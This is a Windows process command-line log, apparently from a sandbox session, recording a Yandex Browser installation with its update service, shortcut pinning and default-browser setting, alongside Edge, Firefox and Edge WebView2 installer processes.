"C:\Users\Admin\AppData\Local\Temp\yb82DD.tmp" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\e6404363-3454-42cd-9323-98912f84c8f0.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --browser-present=none --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --distr-info-file="C:\Users\Admin\AppData\Local\Temp\distrib_info" --histogram-download-time=18 --install-start-time-no-uac=1325612191 --installer-brand-id=yandex --installer-partner-id=switch-brand --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --make-browser-default-after-import --ok-button-pressed-time=1325425151 --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=197254 --send-statistics --source=lite --variations-update-path="C:\Users\Admin\AppData\Local\Temp\84179066-da1e-4621-aebe-a4ef4302eeff.tmp" --verbose-logging
C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\e6404363-3454-42cd-9323-98912f84c8f0.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --browser-present=none --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --distr-info-file="C:\Users\Admin\AppData\Local\Temp\distrib_info" --histogram-download-time=18 --install-start-time-no-uac=1325612191 --installer-brand-id=yandex --installer-partner-id=switch-brand --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --make-browser-default-after-import --ok-button-pressed-time=1325425151 --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=197254 --send-statistics --source=lite --variations-update-path="C:\Users\Admin\AppData\Local\Temp\84179066-da1e-4621-aebe-a4ef4302eeff.tmp" --verbose-logging
C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe" --install-archive="C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\BROWSER.PACKED.7Z" --abt-config-resource-file="C:\Users\Admin\AppData\Local\Temp\abt_config_resource" --abt-update-path="C:\Users\Admin\AppData\Local\Temp\e6404363-3454-42cd-9323-98912f84c8f0.tmp" --brand-name=yandex --brand-package="C:\Users\Admin\AppData\Local\Temp\BrandFile" --browser-present=none --clids-file="C:\Users\Admin\AppData\Local\Temp\clids.xml" --distr-info-file="C:\Users\Admin\AppData\Local\Temp\distrib_info" --histogram-download-time=18 --install-start-time-no-uac=1325612191 --installer-brand-id=yandex --installer-partner-id=switch-brand --installerdata="C:\Users\Admin\AppData\Local\Temp\master_preferences" --make-browser-default-after-import --ok-button-pressed-time=1325425151 --partner-package="C:\Users\Admin\AppData\Local\Temp\PartnerFile" --progress-window=197254 --send-statistics --source=lite --variations-update-path="C:\Users\Admin\AppData\Local\Temp\84179066-da1e-4621-aebe-a4ef4302eeff.tmp" --verbose-logging --verbose-logging --run-as-admin --target-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application" --child-setup-process --restart-as-admin-time=1346597491
C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe
C:\Users\Admin\AppData\Local\Temp\YB_FC3C6.tmp\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=2176 --annotation=plat=Win64 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.1.598 --initial-client-data=0x2bc,0x2c0,0x2c4,0x298,0x2c8,0x7ff7d8fd04b8,0x7ff7d8fd04c4,0x7ff7d8fd04d0
C:\Windows\TEMP\sdwra_2176_1806173670\service_update.exe
"C:\Windows\TEMP\sdwra_2176_1806173670\service_update.exe" --setup
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe" --install
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe" --run-as-service
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=7408 --annotation=plat=Win64 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.1.598 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ff6be54caf8,0x7ff6be54cb04,0x7ff6be54cb10
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe" --update-scheduler
C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe
"C:\Program Files (x86)\Yandex\YandexBrowser\24.10.1.598\service_update.exe" --update-background-scheduler
C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe
"C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe" --pttw1="C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yandex.lnk"
C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe
C:\Windows\SystemTemp\scoped_dir2176_640501534\explorer.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=6020 --annotation=plat=Win64 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.1.598 --initial-client-data=0x2b4,0x2b8,0x2bc,0x2b0,0x2c0,0x7ff617e504b8,0x7ff617e504c4,0x7ff617e504d0
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6092 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,9035039480931229019,6393212199045304370,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1972 /prefetch:1
C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe
C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent
C:\Users\Admin\AppData\Local\Temp\pin\explorer.exe
C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.exe --silent /pin-path="C:\Users\Admin\AppData\Local\Yandex\YaPin\Yandex.lnk" --is-pinning
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Temp\clids.xml"
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\clidmgr.exe" --appid=yabrowser --vendor-xml-path="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Temp\source2176_2143005071\Browser-bin\clids_yandex.xml"
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --progress-window=197254 --ok-button-pressed-time=1325425151 --install-start-time-no-uac=1325612191
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id= --annotation=main_process_pid=8340 --annotation=metrics_client_id=30a9ac481e964f0e988b4bf9d8d4d353 --annotation=plat=Win64 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.1.598 --initial-client-data=0x174,0x178,0x17c,0x150,0x180,0x7ffeaa12ef88,0x7ffeaa12ef94,0x7ffeaa12efa0
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --gpu-process-kind=sandboxed --field-trial-handle=2364,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=2356 /prefetch:2
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=gpu-process --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --use-gl=disabled --gpu-process-kind=trampoline --field-trial-handle=2188,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=2460 /prefetch:6
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=ru --service-sandbox-type=none --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Network Service" --field-trial-handle=2252,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=2700 --brver=24.10.1.598 /prefetch:3
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=ru --service-sandbox-type=service --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Storage Service" --field-trial-handle=2896,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=2984 --brver=24.10.1.598 /prefetch:8
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=ru --service-sandbox-type=audio --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Audio Service" --field-trial-handle=3372,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=3388 --brver=24.10.1.598 /prefetch:8
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=ru --service-sandbox-type=none --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Video Capture" --field-trial-handle=3768,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=3968 --brver=24.10.1.598 /prefetch:8
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --extension-process --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=3984,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=4000 /prefetch:2
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=ru --service-sandbox-type=service --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Data Decoder Service" --field-trial-handle=4056,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=4192 --brver=24.10.1.598 /prefetch:8
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=ru --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --process-name="Импорт профилей" --field-trial-handle=4868,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=4852 --brver=24.10.1.598 /prefetch:8
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --allow-prefetch --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5104,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=5240 /prefetch:1
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe" --set-as-default-browser
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\24.10.1.598\Installer\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --url=https://crash-reports.browser.yandex.net/submit --annotation=machine_id=488dca4c15f9a1d330ad312b391a804e --annotation=main_process_pid=7796 --annotation=plat=Win64 --annotation=prod=Yandex --annotation=session_logout=False --annotation=ver=24.10.1.598 --initial-client-data=0x2b0,0x2b4,0x2b8,0x28c,0x2bc,0x7ff6d74404b8,0x7ff6d74404c4,0x7ff6d74404d0
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=renderer --user-id=7C3DBA1A-7716-4999-9CF7-27435BF57288 --brand-id=yandex --partner-id=switch-brand --help-url=https://api.browser.yandex.ru/redirect/help/ --user-agent-info --web-ntp-url-for-renderer=https://webntp.yandex.ru/ --translate-security-origin=https://browser.translate.yandex.net/ --enable-instaserp --video-capture-use-gpu-memory-buffer --lang=ru --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=5424,i,5028531071694065391,10995797882624495409,262144 --enable-features=InstallerNewIdentity2024 --disable-features=WebGalleryRotation --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:1
C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe
"C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\Application\browser.exe" --type=fallback-handler --database="C:\Users\Admin\AppData\Local\Yandex\YandexBrowser\User Data\Crashpad" --exception-pointers=61881889669312 --process=272 /prefetch:7 --thread=9744
C:\Windows\system32\werfault.exe
werfault.exe /h /shared Global\30641aaf0c1a4e1a90d79e2abff1031f /t 3776 /p 8340
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4f0 0x4ec
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13608 -childID 58 -isForBrowser -prefsHandle 13488 -prefMapHandle 13492 -prefsLen 28359 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {59f09b41-7927-41cd-be68-42b97f2b2e03} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9576 -childID 59 -isForBrowser -prefsHandle 11396 -prefMapHandle 12456 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {50abb76d-3a84-4c54-9c66-2346bce54538} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=8452 -childID 60 -isForBrowser -prefsHandle 10660 -prefMapHandle 6388 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {708ae451-c5a4-4481-8367-e91c5a900de0} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=13428 -childID 61 -isForBrowser -prefsHandle 13496 -prefMapHandle 10448 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {eb9d4606-37c7-4015-85ad-5424fa57a039} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=7576 -childID 62 -isForBrowser -prefsHandle 5088 -prefMapHandle 5096 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {54319cd7-af3f-49ce-9a5c-4af61e50b7bd} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=10076 -childID 63 -isForBrowser -prefsHandle 13424 -prefMapHandle 9220 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {f4adcace-c7df-47a7-a80b-fefce0d875a1} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=12156 -childID 64 -isForBrowser -prefsHandle 10512 -prefMapHandle 12148 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {26dc6e8e-27d7-43b0-ab1f-1a74dbba8eaa} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=9856 -childID 65 -isForBrowser -prefsHandle 5124 -prefMapHandle 5116 -prefsLen 28690 -prefMapSize 244658 -jsInitHandle 1256 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c8692f2d-63d2-4022-b878-558820c82531} 1072 "\\.\pipe\gecko-crash-server-pipe.1072" tab
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\AppData\Local\Temp\e884b7fd-375d-4559-8fa8-eb94c6a9918a_setup.zip.18a\setup\setup.exe
"C:\Users\Admin\AppData\Local\Temp\e884b7fd-375d-4559-8fa8-eb94c6a9918a_setup.zip.18a\setup\setup.exe"
C:\Users\Admin\AppData\Local\Temp\2debcf2e-24ee-4970-ba69-2d700ce59c35_setup.zip.c35\setup\setup.exe
"C:\Users\Admin\AppData\Local\Temp\2debcf2e-24ee-4970-ba69-2d700ce59c35_setup.zip.c35\setup\setup.exe"
C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe
"C:\Users\Admin\AppData\Local\Temp\7867d0d6-c5c1-4617-8960-9ac539ff7f60_setup.zip.f60\setup\setup.exe"
C:\Users\Admin\AppData\Local\Temp\2fd576ec-0263-444d-9e6c-1a1ae5128e7a_setup.zip.e7a\setup\setup.exe
"C:\Users\Admin\AppData\Local\Temp\2fd576ec-0263-444d-9e6c-1a1ae5128e7a_setup.zip.e7a\setup\setup.exe"
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
C:\Users\Admin\AppData\Local\Temp\MicrosoftEdgeWebview2Setup.exe
C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\Temp\EU1BE7.tmp\MicrosoftEdgeUpdate.exe" /installsource taggedmi /install "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regsvc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /regserver
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\1.3.195.25\MicrosoftEdgeUpdateComRegisterShell64.exe"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuMjUiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuMjUiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7Q0I4Mzk0NDEtOUMyMi00MzgxLTkzRDItNjBDQTAyMEQ1NTU4fSIgdXNlcmlkPSJ7MzJBMjZDMUEtRjUyMC00QkVBLThCRDYtN0E2QTBFRkI4OERCfSIgaW5zdGFsbHNvdXJjZT0idGFnZ2VkbWkiIHJlcXVlc3RpZD0iezNEM0UxMzA2LTBBNTMtNDEyOS1BRTlFLTEwQTlBMTFBREVFRH0iIGRlZHVwPSJjciIgZG9tYWluam9pbmVkPSIwIj48aHcgbG9naWNhbF9jcHVzPSI4IiBwaHlzbWVtb3J5PSI4IiBkaXNrX3R5cGU9IjIiIHNzZT0iMSIgc3NlMj0iMSIgc3NlMz0iMSIgc3NzZTM9IjEiIHNzZTQxPSIxIiBzc2U0Mj0iMSIgYXZ4PSIxIi8-PG9zIHBsYXRmb3JtPSJ3aW4iIHZlcnNpb249IjEwLjAuMTkwNDQuNDUyOSIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjEyNSIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iIi8-PGFwcCBhcHBpZD0ie0YzQzRGRTAwLUVGRDUtNDAzQi05NTY5LTM5OEEyMEYxQkE0QX0iIHZlcnNpb249IjEuMy4xNDcuMzciIG5leHR2ZXJzaW9uPSIxLjMuMTk1LjI1IiBsYW5nPSIiIGJyYW5kPSIiIGNsaWVudD0iIj48ZXZlbnQgZXZlbnR0eXBlPSIyIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIwIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSIxNDk0NDk0NjkyMSIgaW5zdGFsbF90aW1lX21zPSI0NDIiLz48L2FwcD48L3JlcXVlc3Q-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /handoff "appguid={F3017226-FE2A-4295-8BDF-00C3A9A7E4C5}&appname=Microsoft%20Edge%20Webview2%20Runtime&needsadmin=prefers" /installsource taggedmi /sessionid "{CB839441-9C22-4381-93D2-60CA020D5558}"
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /svc
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
